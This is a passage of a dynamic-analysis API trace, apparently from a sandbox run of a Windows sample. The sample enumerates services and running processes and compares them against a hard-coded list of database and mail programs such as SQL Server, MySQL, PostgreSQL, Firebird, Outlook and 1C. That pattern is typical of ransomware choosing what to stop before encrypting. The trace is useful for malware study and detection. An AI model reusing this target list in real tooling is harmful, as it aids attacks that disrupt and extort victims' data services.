	[0032.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0032.939] lstrlenW (lpString="RpcSs") returned 5
	[0032.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0032.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0032.939] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0032.939] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0032.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0032.939] lstrlenW (lpString="SamSs") returned 5
	[0032.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0032.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0032.939] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0032.939] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0032.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0032.939] lstrlenW (lpString="Schedule") returned 8
	[0032.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0032.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0032.940] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0032.940] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0032.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0032.940] lstrlenW (lpString="SENS") returned 4
	[0032.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0032.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0032.940] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0032.940] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0032.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0032.940] lstrlenW (lpString="ShellHWDetection") returned 16
	[0032.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0032.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0032.940] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0032.940] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0032.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0032.940] lstrlenW (lpString="Spooler") returned 7
	[0032.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0032.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0032.940] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0032.940] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0032.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0032.940] lstrlenW (lpString="SysMain") returned 7
	[0032.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0032.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0032.940] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0032.940] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0032.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0032.940] lstrlenW (lpString="Themes") returned 6
	[0032.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0032.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0032.940] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0032.940] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0032.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0032.941] lstrlenW (lpString="TrkWks") returned 6
	[0032.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0032.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0032.941] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0032.941] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0032.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0032.941] lstrlenW (lpString="UxSms") returned 5
	[0032.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0032.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0032.941] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0032.941] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0032.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0032.941] lstrlenW (lpString="WdiServiceHost") returned 14
	[0032.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0032.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0032.941] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0032.941] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0032.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0032.941] lstrlenW (lpString="WdiSystemHost") returned 13
	[0032.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0032.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0032.941] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0032.941] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0032.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0032.941] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0032.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0032.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0032.941] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0032.941] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0032.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0032.941] lstrlenW (lpString="Winmgmt") returned 7
	[0032.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0032.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0032.942] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0032.942] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0032.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0032.942] lstrlenW (lpString="WPDBusEnum") returned 10
	[0032.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0032.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0032.942] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0032.942] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0032.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0032.942] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4324d8 | out: hHeap=0x7d60000) returned 1
	[0032.942] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x168
	[0032.946] Process32FirstW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0032.946] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0032.946] lstrlenW (lpString="System") returned 6
	[0032.946] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0032.946] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0032.946] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0032.946] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0032.947] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0032.947] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0032.947] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0032.947] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0032.947] lstrlenW (lpString="smss.exe") returned 8
	[0032.947] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0032.947] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0032.947] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0032.947] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0032.947] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0032.947] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0032.947] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0032.947] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0032.948] lstrlenW (lpString="csrss.exe") returned 9
	[0032.948] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0032.948] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0032.948] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0032.948] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0032.948] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0032.948] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0032.948] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0032.948] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0032.948] lstrlenW (lpString="wininit.exe") returned 11
	[0032.948] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0032.948] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0032.948] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0032.948] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0032.948] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0032.948] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0032.949] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0032.949] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0032.949] lstrlenW (lpString="csrss.exe") returned 9
	[0032.949] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0032.949] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0032.949] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0032.949] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0032.949] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0032.949] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0032.949] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0032.950] lstrlenW (lpString="winlogon.exe") returned 12
	[0032.950] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0032.950] lstrlenW (lpString="services.exe") returned 12
	[0032.950] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0032.951] lstrlenW (lpString="lsass.exe") returned 9
	[0032.951] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0032.951] lstrlenW (lpString="lsm.exe") returned 7
	[0032.951] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0032.952] lstrlenW (lpString="svchost.exe") returned 11
	[0032.952] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0032.952] lstrlenW (lpString="svchost.exe") returned 11
	[0032.952] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0032.952] lstrlenW (lpString="svchost.exe") returned 11
	[0032.953] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0032.953] lstrlenW (lpString="svchost.exe") returned 11
	[0032.953] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0032.953] lstrlenW (lpString="svchost.exe") returned 11
	[0032.953] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0032.954] lstrlenW (lpString="audiodg.exe") returned 11
	[0032.954] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0032.955] lstrlenW (lpString="svchost.exe") returned 11
	[0032.955] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0032.955] lstrlenW (lpString="svchost.exe") returned 11
	[0032.955] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0032.956] lstrlenW (lpString="dwm.exe") returned 7
	[0032.956] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0032.956] lstrlenW (lpString="explorer.exe") returned 12
	[0032.956] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0032.956] lstrlenW (lpString="spoolsv.exe") returned 11
	[0032.957] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0032.957] lstrlenW (lpString="taskhost.exe") returned 12
	[0032.957] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0032.957] lstrlenW (lpString="svchost.exe") returned 11
	[0032.957] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0032.958] lstrlenW (lpString="taskeng.exe") returned 11
	[0032.958] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0032.958] lstrlenW (lpString="taskhost.exe") returned 12
	[0032.958] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0032.959] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0032.959] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0032.959] lstrlenW (lpString="python tragedy.exe") returned 18
	[0032.959] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0032.960] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0032.960] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0032.960] lstrlenW (lpString="computers.exe") returned 13
	[0032.960] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0032.961] lstrlenW (lpString="separated.exe") returned 13
	[0032.961] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0032.961] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0032.961] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0032.962] lstrlenW (lpString="darkness.exe") returned 12
	[0032.962] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0032.962] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0032.962] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0032.963] lstrlenW (lpString="sophisticated.exe") returned 17
	[0032.963] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0032.963] lstrlenW (lpString="wishlist.exe") returned 12
	[0032.963] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0032.963] lstrlenW (lpString="top.exe") returned 7
	[0032.963] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0032.964] lstrlenW (lpString="implemented.exe") returned 15
	[0032.964] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0032.964] lstrlenW (lpString="comp.exe") returned 8
	[0032.964] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0032.965] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0032.965] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0032.965] lstrlenW (lpString="solved.exe") returned 10
	[0032.965] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0032.966] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0032.966] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0032.966] lstrlenW (lpString="trips.exe") returned 9
	[0032.966] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0032.967] lstrlenW (lpString="tumormanual.exe") returned 15
	[0032.967] Process32NextW (in: hSnapshot=0x168, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0032.967] lstrlenW (lpString="telecom.exe") returned 11
